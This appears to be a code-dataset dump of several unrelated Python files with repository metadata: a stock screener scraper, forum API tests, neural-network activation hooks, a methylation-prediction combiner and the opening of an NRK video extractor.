if hasattr(loss_fn, "reduction"):
msg0 = "Please ensure loss_fn.reduction is set to `sum` or `mean`"
assert loss_fn.reduction != "none", msg0
msg1 = (
f"loss_fn.reduction ({loss_fn.reduction}) does not match reduction "
f"type ({reduction_type}). Please ensure they are matching."
)
assert loss_fn.reduction == reduction_type, msg1
msg2 = (
"Please ensure custom loss function is applying either a "
"sum or mean reduction."
)
assert out.shape != loss.shape, msg2
if reduction_type != "sum" and reduction_type != "mean":
raise ValueError(
f"{reduction_type} is not a valid value for reduction_type. "
"Must be either 'sum' or 'mean'."
)
out = loss
model.zero_grad()
out.backward(gradient=torch.ones_like(out))
autograd_hacks.compute_grad1(model, loss_type=reduction_type)
grads = tuple(
param.grad1 # type: ignore
for param in model.parameters()
if hasattr(param, "grad1")
)
autograd_hacks.clear_backprops(model)
autograd_hacks.remove_hooks(model)
return grads
| true
| true
|
f70b35660098dbe1269746ca58b92936f76d8216
| 609
|
py
|
Python
|
reit_project/reit-data/get-reit.py
|
SamMonk/data-bot
|
2311870e993c5c2d1de617d31b3f7a6641da2a9b
|
[
"MIT"
] | null | null | null |
reit_project/reit-data/get-reit.py
|
SamMonk/data-bot
|
2311870e993c5c2d1de617d31b3f7a6641da2a9b
|
[
"MIT"
] | 5
|
2021-03-31T20:06:34.000Z
|
2022-03-12T00:58:22.000Z
|
reit_project/reit-data/get-reit.py
|
SamMonk/data-bot
|
2311870e993c5c2d1de617d31b3f7a6641da2a9b
|
[
"MIT"
] | null | null | null |
#https://finance.yahoo.com/screener/6039bb71-c189-4b62-ab6d-6dbd659495bb?count=200
import requests
from bs4 import BeautifulSoup
# Fetch the live screener page; note that the parsing below reads a saved
# snapshot of this page rather than the live response.
my_screener = requests.get('https://finance.yahoo.com/screener/6039bb71-c189-4b62-ab6d-6dbd659495bb?count=200')
with open('code/reit-data/reits-screener.html','r') as ticker_report:
ticker_table_string = ticker_report.read()
soup = BeautifulSoup(ticker_table_string, "html.parser")
tables = soup.find_all("table")
# The first table holds the screener rows; each ticker symbol is rendered as a link.
tickers = tables[0].find_all("a")
for ticker in tickers:
print(ticker.text)
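# Hedged sketch: the same table extraction applied to the live response
# fetched above instead of the saved snapshot. Yahoo may render this page
# client-side, in which case no tables are found and an empty list results.
def live_tickers():
    live_soup = BeautifulSoup(my_screener.text, "html.parser")
    live_tables = live_soup.find_all("table")
    return [a.text for a in live_tables[0].find_all("a")] if live_tables else []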
| 30.45
| 112
| 0.740558
|
import requests
from bs4 import BeautifulSoup
my_screener = requests.get('https://finance.yahoo.com/screener/6039bb71-c189-4b62-ab6d-6dbd659495bb?count=200')
with open('code/reit-data/reits-screener.html','r') as ticker_report:
ticker_table_string = ticker_report.read()
soup = BeautifulSoup(ticker_table_string, "html.parser")
tables = soup.find_all("table")
tickers = tables[0].find_all("a")
for ticker in tickers:
print(ticker.text)
| true
| true
|
f70b3646b5d05db86a2415800f42bd74a54fb82f
| 7,072
|
py
|
Python
|
tests/test_users.py
|
AndreyAD1/forum
|
bae8bee6c45ca53b717c661a4dc624fec05aca35
|
[
"MIT"
] | null | null | null |
tests/test_users.py
|
AndreyAD1/forum
|
bae8bee6c45ca53b717c661a4dc624fec05aca35
|
[
"MIT"
] | null | null | null |
tests/test_users.py
|
AndreyAD1/forum
|
bae8bee6c45ca53b717c661a4dc624fec05aca35
|
[
"MIT"
] | null | null | null |
from collections import defaultdict
import logging
import random
from faker import Faker
import requests
logger = logging.getLogger(__file__)
def test_create_user():
fake = Faker()
user_info = {
'username': fake.first_name() + str(random.randint(1, 1000)),
'common_name': fake.name(),
'email': fake.email(),
'password': 'pass'
}
logger.info(f'Create the user: {user_info}')
response = requests.post(
'http://127.0.0.1:5000/api/v1/users/create',
json=user_info
)
logger.info(f'Receive response: {response.text}')
assert response.status_code == 201
response_json = response.json()
assert len(response_json) == 1
user_id = response_json.get('user_id')
assert user_id
assert isinstance(user_id, int)
def test_get_token():
fake = Faker()
user_info = {
'username': fake.first_name() + str(random.randint(1, 1000)),
'common_name': fake.name(),
'email': fake.email(),
'password': 'pass'
}
logger.info(f'Create the user: {user_info}')
response = requests.post(
'http://127.0.0.1:5000/api/v1/users/create',
json=user_info
)
logger.info(f'Receive response: {response.text}')
response = requests.post(
f'http://127.0.0.1:5000/api/v1/tokens',
auth=(user_info['username'], user_info['password'])
)
logger.info(f'Receive response: {response.text}')
assert response.status_code == 200
response_json = response.json()
assert len(response_json) == 1
token = response_json.get('token')
assert token
def test_get_user():
fake = Faker()
user_info = {
'username': fake.first_name() + str(random.randint(1, 1000)),
'common_name': fake.name(),
'email': fake.email(),
'password': 'pass'
}
logger.info(f'Create the user: {user_info}')
response = requests.post(
'http://127.0.0.1:5000/api/v1/users/create',
json=user_info
)
logger.info(f'Receive response: {response.text}')
user_id = response.json()['user_id']
response = requests.post(
f'http://127.0.0.1:5000/api/v1/tokens',
auth=(user_info['username'], user_info['password'])
)
logger.info(f'Receive response: {response.text}')
token = response.json()['token']
headers = {'Authorization': f'Bearer {token}'}
response = requests.get(
f'http://127.0.0.1:5000/api/v1/users/{user_id}',
headers=headers
)
logger.info(f'Receive response: {response.text}')
expected_user = {
'id': user_id,
'username': user_info['username'],
'common_name': user_info['common_name'],
'email': user_info['email']
}
assert response.status_code == 200
assert response.json() == expected_user
def test_update_user():
fake = Faker()
user_info = {
'username': fake.first_name() + str(random.randint(1, 1000)),
'common_name': fake.name(),
'email': fake.email(),
'password': 'pass'
}
logger.info(f'Create the user: {user_info}')
response = requests.post(
'http://127.0.0.1:5000/api/v1/users/create',
json=user_info
)
logger.info(f'Receive response: {response.text}')
user_id = response.json()['user_id']
response = requests.post(
f'http://127.0.0.1:5000/api/v1/tokens',
auth=(user_info['username'], user_info['password'])
)
logger.info(f'Receive response: {response.text}')
token = response.json()['token']
headers = {'Authorization': f'Bearer {token}'}
fields_to_update = {
'username': fake.first_name() + str(random.randint(1, 1000)),
'common_name': fake.name(),
'email': fake.email(),
}
response = requests.put(
f'http://127.0.0.1:5000/api/v1/users/{user_id}',
headers=headers,
json=fields_to_update
)
logger.info(f'Receive response: {response.text}')
expected_user = {
'id': user_id,
'username': fields_to_update['username'],
'common_name': fields_to_update['common_name'],
'email': fields_to_update['email']
}
assert response.status_code == 200
assert response.json() == expected_user
def test_get_user_posts():
fake = Faker()
user_info = {
'username': fake.first_name() + str(random.randint(1, 1000)),
'common_name': fake.name(),
'email': fake.email(),
'password': 'pass'
}
logger.info(f'Create the user: {user_info}')
response = requests.post(
'http://127.0.0.1:5000/api/v1/users/create',
json=user_info
)
logger.info(f'Receive response: {response.text}')
user_id = response.json()['user_id']
response = requests.post(
f'http://127.0.0.1:5000/api/v1/tokens',
auth=(user_info['username'], user_info['password'])
)
logger.info(f'Receive response: {response.text}')
token = response.json()['token']
forum_info = {
'name': fake.company() + str(random.randint(1, 1000)),
'short_name': fake.company_suffix() + str(random.randint(1, 1000))
}
headers = {'Authorization': f'Bearer {token}'}
response = requests.post(
f'http://127.0.0.1:5000/api/v1/forums/create',
headers=headers,
json=forum_info
)
logger.info(f'Receive response: {response.text}')
assert response.status_code == 201
forum_id = response.json()['forum_id']
thread_info = {
'name': fake.company() + str(random.randint(1, 1000)),
'short_name': fake.company_suffix() + str(random.randint(1, 1000)),
'text': fake.text(),
'forum_id': forum_id
}
response = requests.post(
'http://127.0.0.1:5000/api/v1/threads/create',
json=thread_info,
headers=headers
)
logger.info(f'Receive response: {response.text}')
thread_id = response.json()['thread_id']
headers = {'Authorization': f'Bearer {token}'}
expected_posts = defaultdict(dict)
for _ in range(3):
post_text = fake.text()
response = requests.post(
'http://127.0.0.1:5000/api/v1/posts/create',
json={'text': post_text, 'thread_id': thread_id},
headers=headers
)
assert response.status_code == 201
expected_posts[response.json()['post_id']] = post_text
response = requests.get(
f'http://127.0.0.1:5000/api/v1/users/{user_id}/posts',
headers=headers
)
logger.info(f'Get user posts response: {response.text}')
assert response.status_code == 200
response_json = response.json()
returned_posts = response_json.get('user_posts')
assert returned_posts is not None
assert len(returned_posts) == len(expected_posts)
for post in returned_posts:
post_id = post.get('id')
assert post_id in expected_posts
expected_text = expected_posts[post_id]
assert post.get('text') == expected_text
assert post.get('user_id') == user_id
assert post.get('creation_timestamp')
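# Hedged sketch (not part of the suite): the create-user/get-token preamble
# repeated in every test above could be factored into one helper like this.
def _make_user_and_token():
    fake = Faker()
    user_info = {
        'username': fake.first_name() + str(random.randint(1, 1000)),
        'common_name': fake.name(),
        'email': fake.email(),
        'password': 'pass'
    }
    user_id = requests.post(
        'http://127.0.0.1:5000/api/v1/users/create', json=user_info
    ).json()['user_id']
    token = requests.post(
        'http://127.0.0.1:5000/api/v1/tokens',
        auth=(user_info['username'], user_info['password'])
    ).json()['token']
    return user_info, user_id, token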
| 31.431111
| 75
| 0.610436
|
from collections import defaultdict
import logging
import random
from faker import Faker
import requests
logger = logging.getLogger(__file__)
def test_create_user():
fake = Faker()
user_info = {
'username': fake.first_name() + str(random.randint(1, 1000)),
'common_name': fake.name(),
'email': fake.email(),
'password': 'pass'
}
logger.info(f'Create the user: {user_info}')
response = requests.post(
'http://127.0.0.1:5000/api/v1/users/create',
json=user_info
)
logger.info(f'Receive response: {response.text}')
assert response.status_code == 201
response_json = response.json()
assert len(response_json) == 1
user_id = response_json.get('user_id')
assert user_id
assert isinstance(user_id, int)
def test_get_token():
fake = Faker()
user_info = {
'username': fake.first_name() + str(random.randint(1, 1000)),
'common_name': fake.name(),
'email': fake.email(),
'password': 'pass'
}
logger.info(f'Create the user: {user_info}')
response = requests.post(
'http://127.0.0.1:5000/api/v1/users/create',
json=user_info
)
logger.info(f'Receive response: {response.text}')
response = requests.post(
f'http://127.0.0.1:5000/api/v1/tokens',
auth=(user_info['username'], user_info['password'])
)
logger.info(f'Receive response: {response.text}')
assert response.status_code == 200
response_json = response.json()
assert len(response_json) == 1
token = response_json.get('token')
assert token
def test_get_user():
fake = Faker()
user_info = {
'username': fake.first_name() + str(random.randint(1, 1000)),
'common_name': fake.name(),
'email': fake.email(),
'password': 'pass'
}
logger.info(f'Create the user: {user_info}')
response = requests.post(
'http://127.0.0.1:5000/api/v1/users/create',
json=user_info
)
logger.info(f'Receive response: {response.text}')
user_id = response.json()['user_id']
response = requests.post(
f'http://127.0.0.1:5000/api/v1/tokens',
auth=(user_info['username'], user_info['password'])
)
logger.info(f'Receive response: {response.text}')
token = response.json()['token']
headers = {'Authorization': f'Bearer {token}'}
response = requests.get(
f'http://127.0.0.1:5000/api/v1/users/{user_id}',
headers=headers
)
logger.info(f'Receive response: {response.text}')
expected_user = {
'id': user_id,
'username': user_info['username'],
'common_name': user_info['common_name'],
'email': user_info['email']
}
assert response.status_code == 200
assert response.json() == expected_user
def test_update_user():
fake = Faker()
user_info = {
'username': fake.first_name() + str(random.randint(1, 1000)),
'common_name': fake.name(),
'email': fake.email(),
'password': 'pass'
}
logger.info(f'Create the user: {user_info}')
response = requests.post(
'http://127.0.0.1:5000/api/v1/users/create',
json=user_info
)
logger.info(f'Receive response: {response.text}')
user_id = response.json()['user_id']
response = requests.post(
f'http://127.0.0.1:5000/api/v1/tokens',
auth=(user_info['username'], user_info['password'])
)
logger.info(f'Receive response: {response.text}')
token = response.json()['token']
headers = {'Authorization': f'Bearer {token}'}
fields_to_update = {
'username': fake.first_name() + str(random.randint(1, 1000)),
'common_name': fake.name(),
'email': fake.email(),
}
response = requests.put(
f'http://127.0.0.1:5000/api/v1/users/{user_id}',
headers=headers,
json=fields_to_update
)
logger.info(f'Receive response: {response.text}')
expected_user = {
'id': user_id,
'username': fields_to_update['username'],
'common_name': fields_to_update['common_name'],
'email': fields_to_update['email']
}
assert response.status_code == 200
assert response.json() == expected_user
def test_get_user_posts():
fake = Faker()
user_info = {
'username': fake.first_name() + str(random.randint(1, 1000)),
'common_name': fake.name(),
'email': fake.email(),
'password': 'pass'
}
logger.info(f'Create the user: {user_info}')
response = requests.post(
'http://127.0.0.1:5000/api/v1/users/create',
json=user_info
)
logger.info(f'Receive response: {response.text}')
user_id = response.json()['user_id']
response = requests.post(
f'http://127.0.0.1:5000/api/v1/tokens',
auth=(user_info['username'], user_info['password'])
)
logger.info(f'Receive response: {response.text}')
token = response.json()['token']
forum_info = {
'name': fake.company() + str(random.randint(1, 1000)),
'short_name': fake.company_suffix() + str(random.randint(1, 1000))
}
headers = {'Authorization': f'Bearer {token}'}
response = requests.post(
f'http://127.0.0.1:5000/api/v1/forums/create',
headers=headers,
json=forum_info
)
logger.info(f'Receive response: {response.text}')
assert response.status_code == 201
forum_id = response.json()['forum_id']
thread_info = {
'name': fake.company() + str(random.randint(1, 1000)),
'short_name': fake.company_suffix() + str(random.randint(1, 1000)),
'text': fake.text(),
'forum_id': forum_id
}
response = requests.post(
'http://127.0.0.1:5000/api/v1/threads/create',
json=thread_info,
headers=headers
)
logger.info(f'Receive response: {response.text}')
thread_id = response.json()['thread_id']
headers = {'Authorization': f'Bearer {token}'}
expected_posts = defaultdict(dict)
for _ in range(3):
post_text = fake.text()
response = requests.post(
'http://127.0.0.1:5000/api/v1/posts/create',
json={'text': post_text, 'thread_id': thread_id},
headers=headers
)
assert response.status_code == 201
expected_posts[response.json()['post_id']] = post_text
response = requests.get(
f'http://127.0.0.1:5000/api/v1/users/{user_id}/posts',
headers=headers
)
logger.info(f'Get user posts response: {response.text}')
assert response.status_code == 200
response_json = response.json()
returned_posts = response_json.get('user_posts')
assert returned_posts is not None
assert len(returned_posts) == len(expected_posts)
for post in returned_posts:
post_id = post.get('id')
assert post_id in expected_posts
expected_text = expected_posts[post_id]
assert post.get('text') == expected_text
assert post.get('user_id') == user_id
assert post.get('creation_timestamp')
| true
| true
|
f70b36ff11e294f9ba8cdf3e7c715b9161f3372a
| 9,632
|
py
|
Python
|
model_tools/activations/hooks.py
|
BonnerLab/model-tools
|
ac90617cd79bb70a308e34a1e834971498329fb0
|
[
"MIT"
] | null | null | null |
model_tools/activations/hooks.py
|
BonnerLab/model-tools
|
ac90617cd79bb70a308e34a1e834971498329fb0
|
[
"MIT"
] | null | null | null |
model_tools/activations/hooks.py
|
BonnerLab/model-tools
|
ac90617cd79bb70a308e34a1e834971498329fb0
|
[
"MIT"
] | null | null | null |
from abc import ABC, abstractmethod
import logging
import os
from typing import Optional, Union, Iterable, Dict
import h5py
import numpy as np
import torch
from PIL import Image
from tqdm import tqdm
from brainio.stimuli import StimulusSet
from model_tools.activations import ActivationsModel
from model_tools.activations.core import flatten, change_dict
from model_tools.utils import fullname, s3
from model_tools.utils.pca import IncrementalPCAPytorch, PCAPytorch
from result_caching import store_dict
Stimuli = Union[Iterable[str], StimulusSet, Iterable[os.PathLike]]
BasePCA = Union[IncrementalPCAPytorch, PCAPytorch]
class LayerHookBase(ABC):
def __init__(self, activations_extractor: ActivationsModel, identifier: Optional[str] = None):
self._extractor = activations_extractor
self.identifier = identifier
self.handle = None
def __call__(self, batch_activations: Dict[str, np.ndarray]) -> Dict[str, np.ndarray]:
self.setup(batch_activations)
return change_dict(batch_activations, self.layer_apply, keep_name=True,
multithread=os.getenv('MT_MULTITHREAD', '1') == '1')
@classmethod
def hook(cls, activations_extractor: ActivationsModel, identifier: Optional[str] = None, **kwargs):
hook = cls(activations_extractor=activations_extractor, identifier=identifier, **kwargs)
assert not cls.is_hooked(activations_extractor), f"{cls.__name__} is already hooked"
handle = activations_extractor.register_batch_activations_hook(hook)
hook.handle = handle
return handle
@classmethod
def is_hooked(cls, activations_extractor: ActivationsModel) -> bool:
return any(isinstance(hook, cls) for hook in
activations_extractor._extractor._batch_activations_hooks.values())
def setup(self, batch_activations: Dict[str, np.ndarray]) -> None:
pass
@abstractmethod
def layer_apply(self, layer: str, activations: np.ndarray) -> np.ndarray:
pass
class LayerGlobalMaxPool2d(LayerHookBase):
def __init__(self, *args, identifier: Optional[str] = None, **kwargs):
if identifier is None:
identifier = 'maxpool'
super(LayerGlobalMaxPool2d, self).__init__(*args, **kwargs, identifier=identifier)
def layer_apply(self, layer: str, activations: np.ndarray) -> np.ndarray:
if activations.ndim != 4:
return activations
return np.max(activations, axis=(2, 3))
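# Hedged illustration of what layer_apply does to a conv activation batch:
# a global max over the spatial dimensions, reducing (N, C, H, W) to (N, C).
def _example_global_maxpool():
    acts = np.random.rand(2, 8, 7, 7)  # (N, C, H, W)
    pooled = np.max(acts, axis=(2, 3))
    assert pooled.shape == (2, 8)
    return pooled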
class LayerRandomProjection(LayerHookBase):
def __init__(self, *args,
n_components: int = 1000,
force: bool = False,
identifier: Optional[str] = None,
**kwargs):
if identifier is None:
identifier = f'randproj_ncomponents={n_components}_force={force}'
super(LayerRandomProjection, self).__init__(*args, **kwargs, identifier=identifier)
self._n_components = n_components
self._force = force
self._layer_ws = {}
    def layer_apply(self, layer: str, activations: np.ndarray) -> np.ndarray:
        activations = flatten(activations)
        if activations.shape[1] <= self._n_components and not self._force:
            return activations
        if layer not in self._layer_ws:
            # Gaussian random projection scaled by 1/sqrt(n_components) so that
            # vector norms are roughly preserved; one fixed matrix per layer.
            w = np.random.normal(size=(activations.shape[-1], self._n_components)) / np.sqrt(self._n_components)
            self._layer_ws[layer] = w
        else:
            w = self._layer_ws[layer]
        activations = activations @ w
        return activations
class LayerPCA(LayerHookBase):
def __init__(self, *args,
n_components: int = 1000,
force: bool = False,
stimuli: Optional[Stimuli] = None,
stimuli_identifier: Optional[str] = None,
identifier: Optional[str] = None,
batch_size: Optional[int] = None,
device: Optional[Union[str, torch.device]] = None,
**kwargs):
        if stimuli is None:
            # Default to n_components images from the ImageNet validation set,
            # spread as evenly as possible across the 1000 classes
            stimuli = _get_imagenet_val(n_components)
            stimuli_identifier = 'brainscore-imagenetval'
if isinstance(stimuli, StimulusSet) and stimuli_identifier is None and hasattr(stimuli, 'identifier'):
stimuli_identifier = stimuli.identifier
if stimuli_identifier is None:
raise ValueError('If passing a list of paths for stimuli '
'or a StimulusSet without an identifier attribute, '
'you must provide a stimuli_identifier')
if identifier is None:
identifier = f'pca_ncomponents={n_components}_force={force}_stimuli_identifier={stimuli_identifier}'
super(LayerPCA, self).__init__(*args, **kwargs, identifier=identifier)
self._n_components = n_components
self._force = force
self._stimuli_identifier = stimuli_identifier
self._stimuli = stimuli
self._batch_size = batch_size
self._device = device
self._logger = logging.getLogger(fullname(self))
self._layer_pcas = {}
def setup(self, batch_activations) -> None:
layers = batch_activations.keys()
missing_layers = [layer for layer in layers if layer not in self._layer_pcas]
if len(missing_layers) == 0:
return
layer_pcas = self._pcas(identifier=self._extractor.identifier,
layers=missing_layers,
n_components=self._n_components,
force=self._force,
stimuli_identifier=self._stimuli_identifier)
self._layer_pcas = {**self._layer_pcas, **layer_pcas}
def layer_apply(self, layer: str, activations: np.ndarray) -> np.ndarray:
pca = self._layer_pcas[layer]
activations = flatten(activations)
if pca is None:
return activations
return pca.transform(torch.from_numpy(activations).to(self._device))
@store_dict(dict_key='layers', identifier_ignore=['layers'])
def _pcas(self, identifier, layers, n_components, force, stimuli_identifier) -> Dict[str, BasePCA]:
self._logger.debug(f'Retrieving {stimuli_identifier} activations')
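        # Temporarily disable this hook so the fitting stimuli are extracted raw,
        # without the projection being applied to its own fitting data.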
self.handle.disable()
activations = self._extractor(self._stimuli, layers=layers, stimuli_identifier=False)
activations = {layer: activations.sel(layer=layer).values
for layer in np.unique(activations['layer'])}
assert len(set(layer_activations.shape[0] for layer_activations in activations.values())) == 1, "stimuli differ"
self.handle.enable()
self._logger.debug(f'Computing {stimuli_identifier} principal components')
progress = tqdm(total=len(activations), desc="layer principal components", leave=False)
def init_and_progress(layer, activations):
activations = flatten(activations)
if activations.shape[1] <= n_components and not force:
self._logger.debug(f"Not computing principal components for {layer} "
f"activations {activations.shape} as shape is small enough already")
progress.update(1)
return None
n_components_ = n_components if activations.shape[1] > n_components else activations.shape[1]
if self._batch_size is None:
pca = PCAPytorch(n_components_, device=self._device)
pca.fit(torch.from_numpy(activations).to(self._device))
else:
pca = IncrementalPCAPytorch(n_components_, device=self._device)
for i in range(0, activations.shape[0], self._batch_size):
activations_batch = torch.from_numpy(activations[i:i + self._batch_size]).to(self._device)
pca.fit_partial(activations_batch)
return pca
layer_pcas = change_dict(activations, init_and_progress, keep_name=True,
multithread=os.getenv('MT_MULTITHREAD', '1') == '1')
progress.close()
return layer_pcas
def _get_imagenet_val(num_images):
    _logger = logging.getLogger(fullname(_get_imagenet_val))
    num_classes = 1000
    # The indexing below assumes the validation HDF5 stores 50 images per class,
    # grouped by class; spread the requested num_images evenly across classes.
    num_images_per_class = (num_images - 1) // num_classes
    base_indices = np.arange(num_images_per_class).astype(int)
indices = []
for i in range(num_classes):
indices.extend(50 * i + base_indices)
for i in range((num_images - 1) % num_classes + 1):
indices.extend(50 * i + np.array([num_images_per_class]).astype(int))
framework_home = os.path.expanduser(os.getenv('MT_HOME', '~/.model-tools'))
imagenet_filepath = os.getenv('MT_IMAGENET_PATH', os.path.join(framework_home, 'imagenet2012.hdf5'))
imagenet_dir = f"{imagenet_filepath}-files"
os.makedirs(imagenet_dir, exist_ok=True)
if not os.path.isfile(imagenet_filepath):
os.makedirs(os.path.dirname(imagenet_filepath), exist_ok=True)
_logger.debug(f"Downloading ImageNet validation to {imagenet_filepath}")
s3.download_file("imagenet2012-val.hdf5", imagenet_filepath)
filepaths = []
with h5py.File(imagenet_filepath, 'r') as f:
for index in indices:
imagepath = os.path.join(imagenet_dir, f"{index}.png")
if not os.path.isfile(imagepath):
image = np.array(f['val/images'][index])
Image.fromarray(image).save(imagepath)
filepaths.append(imagepath)
return filepaths
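# Usage sketch (illustrative, with hypothetical names): how these hooks are
# typically attached, assuming an already-constructed ActivationsModel.
# `extractor`, `image_paths`, and the layer name 'layer4' are stand-ins:
#
#   handle = LayerGlobalMaxPool2d.hook(extractor)       # pool conv maps to (batch, channels)
#   pooled = extractor(image_paths, layers=['layer4'])
#   handle.remove()                                     # detach the hook when done
#
#   LayerPCA.hook(extractor, n_components=1000,         # or project onto components fit on
#                 batch_size=256, device='cuda')        # the ImageNet validation stimuli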
f70b387bc0378d9c79b7989c448252e010565e1a | 3,287 | py | Python | combination_model_prediction.py | hrrsjeong/METEORE @ 86f7949a0d65ccdabbbb41c44ea0a37fe4eb33c4 (1 star, 2020-07-16) | also comprna/supermix @ ba8e517c51dbfd3fea5130f297c480c4626c2ff0 | ["MIT"]
# -*- coding: utf-8 -*-
"""
Created on Thu Jul 9 18:03:39 2020
@author: akanksha
"""
import pandas as pd
import numpy as np
import joblib
from itertools import combinations
import sklearn
from functools import reduce
import argparse
import os
parser = argparse.ArgumentParser(description = 'Prediction from combined models for the reads.')
parser.add_argument('--methodsfile','-i', type = str, required = True,
help = 'TSV file containing name and path of the method output tsv file. The output tsv file from the method should be in the format [ID,Pos,Strand,Score]. Can be compressed in gz.')
parser.add_argument('--model','-m', choices = ["default","optimized"], required = True, type = str,
help = 'which model to select from default RF or optimized RF with max_depth 3 and n_estimator 10')
parser.add_argument('--output', '-o',type = str, required = True,
help = 'Where to store the outputs')
options = parser.parse_args()
def mod_file(data_file_path):
    """Load one method's output TSV and normalise it for merging."""
    data_file = pd.read_csv(data_file_path, header=0, sep="\t")
    # Method name = file name up to the first dot (handles .tsv and .tsv.gz).
    name = os.path.basename(data_file_path).split(".")[0]
    data_file.drop_duplicates(subset=["Chr", "ID", "Pos", "Strand"], inplace=True)
    data_file.reset_index(inplace=True, drop=True)
    # Shift minus-strand positions by one base so both strands share coordinates.
    mask = data_file.index[data_file.Strand == "-"].tolist()
    data_file.loc[mask, "Pos"] = data_file.loc[mask, "Pos"] - 1
    data_file.drop(["Strand"], axis=1, inplace=True)
    data_file.rename(columns={"Score": name}, inplace=True)
    return data_file
def main(mp, combine_file):
    loaded_model = joblib.load(mp)
    # Feature columns follow the three key columns (ID, Chr, Pos).
    X = combine_file[combine_file.columns[3:]]
    X = sklearn.preprocessing.MinMaxScaler().fit_transform(X)
    prediction = pd.DataFrame(loaded_model.predict(X))
    prediction_prob = pd.DataFrame(loaded_model.predict_proba(X))
    prediction.rename(columns={0: "Prediction"}, inplace=True)
    # Keep only the probability of the methylated class.
    prediction_prob = prediction_prob[[1]]
    prediction_prob.rename(columns={1: "Prob_methylation"}, inplace=True)
    final_output = pd.concat([combine_file[combine_file.columns[:3]], prediction, prediction_prob], axis=1)
    out_dir = "combined_model_results"
    os.makedirs(out_dir, exist_ok=True)
    final_output.to_csv(os.path.join(out_dir, options.output), header=True, index=None, sep='\t')
if __name__ == '__main__':
    df_file = pd.read_csv(options.methodsfile, header=None, sep='\t')
    if options.model == "default":
        fillval = "default"
    else:
        fillval = "max_depth_3_n_estimator_10"
    modelname = '_'.join(df_file[0])
    mp = 'saved_models/rf_model_' + fillval + '_' + modelname + '.model'
    dfs = [mod_file(path) for path in df_file[1]]
    combine_file = reduce(lambda left, right: pd.merge(left, right, how='inner', on=["ID", "Chr", "Pos"]), dfs)
    combine_file.drop_duplicates(subset=["ID", "Chr", "Pos"], inplace=True)
    combine_file.reset_index(inplace=True, drop=True)
    main(mp, combine_file)
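# Usage sketch (illustrative, with hypothetical file names). --methodsfile is a
# tab-separated file listing one method per line as "<name><TAB><path>", e.g.:
#
#   nanopolish    results/nanopolish_scores.tsv
#   deepsignal    results/deepsignal_scores.tsv
#
#   python combination_model_prediction.py -i method_paths.tsv -m default -o predictions.tsv
#
# With those names the script loads
# saved_models/rf_model_default_nanopolish_deepsignal.model and writes
# combined_model_results/predictions.tsv.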
f70b38a03ce07d299e033c0ceaa1d15797c754cb | 35,573 | py | Python | nextdl/extractor/nrk.py | devenu85/nextdl @ 0b458f556e2e0be80cb94bd9a9b1405ad2e9182d (1 star, 2021-12-19) | ["MIT"]
# coding: utf-8
from __future__ import unicode_literals
import itertools
import random
import re
from ..compat import compat_str
from ..utils import (ExtractorError, determine_ext, int_or_none,
parse_duration, str_or_none, try_get, url_or_none,
urljoin)
from .common import InfoExtractor
class NRKBaseIE(InfoExtractor):
_GEO_COUNTRIES = ["NO"]
_CDN_REPL_REGEX = r"""(?x)://
(?:
nrkod\d{1,2}-httpcache0-47115-cacheod0\.dna\.ip-only\.net/47115-cacheod0|
nrk-od-no\.telenorcdn\.net|
minicdn-od\.nrk\.no/od/nrkhd-osl-rr\.netwerk\.no/no
)/"""
def _extract_nrk_formats(self, asset_url, video_id):
if re.match(r"https?://[^/]+\.akamaihd\.net/i/", asset_url):
return self._extract_akamai_formats(asset_url, video_id)
asset_url = re.sub(r"(?:bw_(?:low|high)=\d+|no_audio_only)&?", "", asset_url)
formats = self._extract_m3u8_formats(
asset_url, video_id, "mp4", "m3u8_native", fatal=False
)
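        # Fall back to randomised Akamai edge hosts when the original CDN URL
        # yields no formats.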
if not formats and re.search(self._CDN_REPL_REGEX, asset_url):
formats = self._extract_m3u8_formats(
re.sub(
self._CDN_REPL_REGEX,
"://nrk-od-%02d.akamaized.net/no/" % random.randint(0, 99),
asset_url,
),
video_id,
"mp4",
"m3u8_native",
fatal=False,
)
return formats
def _raise_error(self, data):
MESSAGES = {
"ProgramRightsAreNotReady": "Du kan dessverre ikke se eller høre programmet",
"ProgramRightsHasExpired": "Programmet har gått ut",
"NoProgramRights": "Ikke tilgjengelig",
"ProgramIsGeoBlocked": "NRK har ikke rettigheter til å vise dette programmet utenfor Norge",
}
message_type = data.get("messageType", "")
# Can be ProgramIsGeoBlocked or ChannelIsGeoBlocked*
if (
"IsGeoBlocked" in message_type
or try_get(data, lambda x: x["usageRights"]["isGeoBlocked"]) is True
):
self.raise_geo_restricted(
msg=MESSAGES.get("ProgramIsGeoBlocked"), countries=self._GEO_COUNTRIES
)
message = data.get("endUserMessage") or MESSAGES.get(message_type, message_type)
raise ExtractorError("%s said: %s" % (self.IE_NAME, message), expected=True)
def _call_api(self, path, video_id, item=None, note=None, fatal=True, query=None):
return self._download_json(
urljoin("https://psapi.nrk.no/", path),
video_id,
note or "Downloading %s JSON" % item,
fatal=fatal,
query=query,
headers={"Accept-Encoding": "gzip, deflate, br"},
)
class NRKIE(NRKBaseIE):
_VALID_URL = r"""(?x)
(?:
nrk:|
https?://
(?:
(?:www\.)?nrk\.no/video/(?:PS\*|[^_]+_)|
v8[-.]psapi\.nrk\.no/mediaelement/
)
)
(?P<id>[^?\#&]+)
"""
_TESTS = [
{
# video
"url": "http://www.nrk.no/video/PS*150533",
"md5": "f46be075326e23ad0e524edfcb06aeb6",
"info_dict": {
"id": "150533",
"ext": "mp4",
"title": "Dompap og andre fugler i Piip-Show",
"description": "md5:d9261ba34c43b61c812cb6b0269a5c8f",
"duration": 262,
},
},
{
# audio
"url": "http://www.nrk.no/video/PS*154915",
# MD5 is unstable
"info_dict": {
"id": "154915",
"ext": "mp4",
"title": "Slik høres internett ut når du er blind",
"description": "md5:a621f5cc1bd75c8d5104cb048c6b8568",
"duration": 20,
},
},
{
"url": "nrk:ecc1b952-96dc-4a98-81b9-5296dc7a98d9",
"only_matching": True,
},
{
"url": "nrk:clip/7707d5a3-ebe7-434a-87d5-a3ebe7a34a70",
"only_matching": True,
},
{
"url": "https://v8-psapi.nrk.no/mediaelement/ecc1b952-96dc-4a98-81b9-5296dc7a98d9",
"only_matching": True,
},
{
"url": "https://www.nrk.no/video/dompap-og-andre-fugler-i-piip-show_150533",
"only_matching": True,
},
{
"url": "https://www.nrk.no/video/humor/kommentatorboksen-reiser-til-sjos_d1fda11f-a4ad-437a-a374-0398bc84e999",
"only_matching": True,
},
{
# podcast
"url": "nrk:l_96f4f1b0-de54-4e6a-b4f1-b0de54fe6af8",
"only_matching": True,
},
{
"url": "nrk:podcast/l_96f4f1b0-de54-4e6a-b4f1-b0de54fe6af8",
"only_matching": True,
},
{
# clip
"url": "nrk:150533",
"only_matching": True,
},
{
